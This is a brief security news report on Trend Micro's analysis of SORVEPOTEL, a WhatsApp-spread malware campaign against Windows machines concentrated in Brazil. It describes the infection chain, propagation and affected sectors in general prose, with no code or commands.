Researchers at Trend Micro warned of a new self‑propagating malware campaign codenamed SORVEPOTEL that spreads via the messaging app WhatsApp and targets Windows systems, with most infections concentrated in Brazil, the researchers said.
The campaign begins with a phishing message sent from an already compromised WhatsApp contact to lend credibility, the report said. The message carries a ZIP attachment that pretends to be a receipt or a health app file, and Trend Micro found evidence the operators have also distributed the same ZIP files by email from seemingly legitimate addresses.
If a recipient opens the attachment on a desktop, the ZIP leads to a Windows shortcut (LNK) file that launches a PowerShell script to retrieve the main payload from an external server (for example, sorvetenopoate[.]com). The downloaded component is a batch script that copies itself to the Windows Startup folder for persistence and runs a PowerShell command to contact a command‑and‑control server for further instructions.
The malware contains a propagation routine that, if it detects WhatsApp Web is active on the infected machine, automatically sends the malicious ZIP to the victim’s contacts and groups. Trend Micro said this automated spreading produces high volumes of spam and frequently results in account suspensions for violating WhatsApp’s terms of service.
Trend Micro reported 477 cases overall, with 457 infections in Brazil, affecting organisations across government, public service, manufacturing, technology, education and construction. The researchers noted the campaign appears engineered for speed and propagation rather than for data theft or ransomware, and that the phishing lure requires desktop execution, suggesting an emphasis on enterprise targets.